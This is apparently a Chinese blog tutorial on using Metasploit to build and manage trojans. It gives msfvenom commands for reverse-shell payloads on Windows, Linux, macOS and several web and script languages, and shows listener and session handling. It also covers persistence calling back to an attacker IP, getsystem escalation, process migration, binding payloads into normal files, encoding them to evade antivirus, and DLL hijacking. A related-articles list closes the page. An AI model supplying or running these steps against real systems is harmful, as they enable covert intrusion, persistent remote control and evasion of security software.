Metasploit(一)
Metasploit木马
- MSF模块介绍
- auxiliary
- exploits
- payloads
- encoders
- nops
- post
- 木马管理
- 开启监听
- 连接多个木马
- 木马持久化
- 木马进程迁移
- 生成木马
- 生成木马
- 木马捆绑
- 木马混淆
- 劫持DLL
- 生成脚本木马
- 设置payload(这里以python为例)
- 配置payload
- 生成木马
- 快捷方式(编写脚本)
- 生成后门
- 木马管理
- 在msfconsole中生成木马并监听
- 设置payload
- 配置payload
- 生成木马
- 开启监听
- 查看后台监听进程
- 查看会话
- 管理id=1的会话
MSF模块介绍
MSF有6个模块,分别对上面目录下的6个子文件夹:
auxiliary
负责执行信息收集、扫描、嗅探、指纹识别、口令猜测和Dos攻击等功能的辅助模块
exploits
利用系统漏洞进行攻击的动作,此模块对应每一个具体漏洞的攻击方法(主动、被动)
payloads
成功exploit之后,真正在目标系统执行的代码或指令。分为3种类型的payload,分别是single、stages和stagers。shellcode是特殊的payload,用于拿shell。
single:all-in-one。完整的payload,这些payload都是一体化的,不需要依赖外部的库和包。
stagers:目标计算机内存有限时,先传输一个较小的payload用于建立连接
stages:利用stagers建立的连接下载后续payload
encoders
对payload进行加密,躲避AntiVirus检查的模块
nops
提高payload稳定性及维持大小。在渗透攻击构造恶意数据缓冲区时,常常要在真正要执行的Shellcode之前添加一段空指令区, 这样当触发渗透攻击后跳转执行ShellCode时,有一个较大的安全着陆区,从而避免受到内存 地址随机化、返回地址计算偏差等原因造成的ShellCode执行失败,提高渗透攻击的可靠性。
post
后期渗透模块。在取得目标系统远程控制权后,进行一系列的后渗透攻击动作,如获取敏感信息、跳板攻击等操作
木马管理
开启监听
msfconsole -q:快速打开
use exploit/multi/handler:使用侦听模块
show options:查看模块配置
set LHOST 本地IP:设置监听IP
set LPORT 端口:设置端口
set payload windows/meterpreter/reverse_tcp:设置payload
run/exploit
meterpreter中输入?或help获得帮助文档
连接多个木马
set exitonsession flase:设置监听多个
run -j:后台监听
jobs:后台进程
jobs -k:停止后台监听
sessions:查看会话
sessions -i id:管理其中ID号对应的会话
bg:回退
木马持久化
run #执行已有的模块,输入run后按两下tab,列出已有的脚本。
run persistence -h :查看木马持久化模块脚本帮助文档
run persistence -x -i 3 -p 444 -r 192.168.124.26
木马进程迁移
ps:查看进程
getsystem:提权
migrate -h:迁移进程模块帮助文档
migrate :进程迁移到pid
生成木马
msfvenom -h :查看帮助
msfvenom -l formats:查看可用文件类型
msfvenom -l archs:查看架构
msfvenom -l platforms:查看平台
生成木马
msfvenom -p windows/meterpreter/reverse_tcp -f exe -a x86 --platform windows -o ./meter_re_tcp_x86.exe
Linux
msfvenom -p linux/x86/meterpreter/reverse_tcp LHOST=< Your IP Address> LPORT=< Your Port to Connect On> -f elf > shell.elf
Windows
msfvenom -p windows/meterpreter/reverse_tcp LHOST= LPORT= -f exe > shell.exe
Mac
msfvenom -p osx/x86/shell_reverse_tcp LHOST= LPORT= -f macho > shell.machoWeb PayloadsPHP
msfvenom -p php/meterpreter_reverse_tcp LHOST= LPORT= -f raw > shell.php
ASP
msfvenom -p windows/meterpreter/reverse_tcp LHOST= LPORT= -f asp > shell.asp
JSP
msfvenom -p java/jsp_shell_reverse_tcp LHOST= LPORT= -f raw > shell.jsp
WAR
msfvenom -p java/jsp_shell_reverse_tcp LHOST= LPORT= -f war > shell.warPython
msfvenom -p cmd/unix/reverse_python LHOST= LPORT= -f raw > shell.py
Bash
msfvenom -p cmd/unix/reverse_bash LHOST= LPORT= -f raw > shell.sh
Perl
msfvenom -p cmd/unix/reverse_perl LHOST= LPORT= -f raw > shell.pl
除此之外;
木马捆绑
-x:将木马捆绑在一个正常文件
木马混淆
-e:将木马使用混淆器混淆
-i: 混淆几次
-k:添加一个新的线程。
劫持DLL
生成恶意DLL只需要将format改为DLL。
在cmd中运行DLL。
命令:rundll32 DLL文件,DllEntryPoint
Dll劫持原理:
先伪造一个系统同名的DLL,提供同样的输出表,每个输出函数转向真正的系统DLL。程序调用系统DLL时会先调用当前目录下伪造的DLL,完成相关功能后,再跳到系统DLL同名函数里执行。这个过程用个形象的词来描述就是系统DLL被劫持(hijack)了。
即可执行文件调用伪造为正常的恶意DLL,恶意DLL在调用原本的DLL,在恶意DLL调用正常DLL时,还可以同时调用我们msf生成的木马DLL。
生成恶意DLL:
https://github.com/strivexjun/AheadLib-x86-x64
让恶意DLL调用我们的木马DLL,VS编译一下
生成脚本木马
设置payload(这里以python为例)
use payload/python/meterpreter/reverse_tcp
配置payload
show options
set LHOST IP
生成木马
生成shellcode
generate -f python -o /root/桌面/back.py
生成源码
generate -f raw -o /root/桌面/bak.py
加了混淆的源码。
快捷方式(编写脚本)
新建目录,在目录里写脚本
生成后门
木马管理
在msfconsole中生成木马并监听
设置payload
use payload/linux/x64/meterpreter/reverse_tcp
配置payload
set lhost 192.168.124.26
生成木马
generate -f elf -o /root/桌面/back
开启监听
handler -H 192.168.124.26 -P 4444 -n linux -p linux/x64/meterpreter/reverse_tcp
查看后台监听进程
jobs
查看会话
sessions
管理id=1的会话
sessions -i 1
Metasploit(一)相关推荐
- Metasploit攻击Oracle的环境搭建
Metasploit中关于Oracle的攻击模块默认并不完全,需要自己做一些工作.本文主要记录在搭建环境的中的一些错误(操作系统Backtrack 5).在默认情况下使用oracle的一些攻击功能会出 ...
- 使用metasploit中Evasion模块
简介 几天前我说了kali这次更新我最关心的是metasploit升级到了5.0,5.0中有一个新的模块叫Evasion模块,这个模块可以轻松的创建反杀毒软件的木马,今天我们就来试一试 操作 首先打开 ...
- Kali linux 2016.2(Rolling)里Metasploit的OpenVAS
关于OpenAVS的概念,我这里不多赘述. 前提得,大家要先安装好OpenVAS!!! 我们都知道,BT5中已经预先安装好了OpenVAS网络漏洞扫描工具,我们只需进行一些配置即可. 具体,请见我下面 ...
- Kali linux 2016.2(Rolling)中metasploit的端口扫描
目前常见的端口扫描技术一般有如下几类: TCP Connect.TCP SYN.TCP ACK.TCP FIN. Metasploit中的端口扫描器 Metasploit的辅助模块中提供了几款实用的 ...
- 使用metasploit收集邮箱
来源:milsec.com 作者:影子牛 转载开始. 发现这个还是蛮有用处的,如果感到蛋疼你就拍拍手,至于收集到邮箱之后做什么用途,各位就可以自己随意发挥了 [root@sms framework3] ...
- All in one: pentest under metasploit
源:http://hi.baidu.com/p3rlish/blog/item/f54f4c097a907f8ad1581b0b.html All in one: pentest under meta ...
- Kali渗透测试——快速查找Metasploit的模块
快速查找Metasploit的模块 在渗透测试过程中,通过NMAP可以获取目标主机服务和操作系统信息:通过Nessus和OpenVAS可以获取目标主机存在的漏洞:或者,通过其他工具获取到关键信息.这时 ...
- Metasploit***技巧:后***Meterpreter代理
前言 Metasploit是一个免费的.可下载的***测试框架,通过它可以很容易地获取.开发并对计算机软件漏洞实施***测试.它本身附带数百个已知软件漏洞的专业级漏洞***测试工具. 当H.D. Mo ...
- php如何检测在另一台设备登录怎么做_如何使用Metasploit的Web Delivery Script和命令注入弹出Shell(翻译)...
Web交付概述 Metasploit包含一个有用的模块,它在你的的设备上创建的服务器上承载一个负载.一旦目标设备连接到服务器并执行负载,就会运行web交付脚本.这个模块是通用的,因为它可以面向Pyth ...
- metasploit 利用MS08-067渗透攻击xp系统全过程
工具:metasploit,目标系统 windows xp sp3 English 渗透攻击过程 1.search MS08-067 2. use exploit/windows/smb/ms0 ...
最新文章
- 汉字转16进制java_java实现汉字转unicode与汉字转16进制实例
- 为什么要低温保存_渔之歌科普课堂:冷冻食品为什么要规定零下18摄氏度冷藏?...
- sql server 小记——分区表(上)
- 揭秘 | 大流量场景下发布如『丝般顺滑』背后的原因
- C#WinForm WebBrowser (二) 实用方法总结
- 投篮c语言程序设计,教师招聘笔试体育之篮球必做20题(一)
- CIKM2021推荐系统论文集锦
- GCC源码自动编译-python脚本
- Hi,我们的代码重构了
- Java正则表达式实例详解
- weblogic查看版本号教程
- 蓝鲸ERP标准版-进销存-采购管理子系统操作说明1
- 牛逼!SpringBoot+Vue企业级支付系统!附源码!
- Rainmeter监控GPU
- Go初体验-实现平方根函数
- Springboot顺利达驾校预约管理系统毕业设计-附源码191748
- git:SSL证书问题:无法获取本地颁发者证书
- 利用vue实现“显示更多”功能
- Java web框架
- 各串口设备节点/dev/tty* 的区别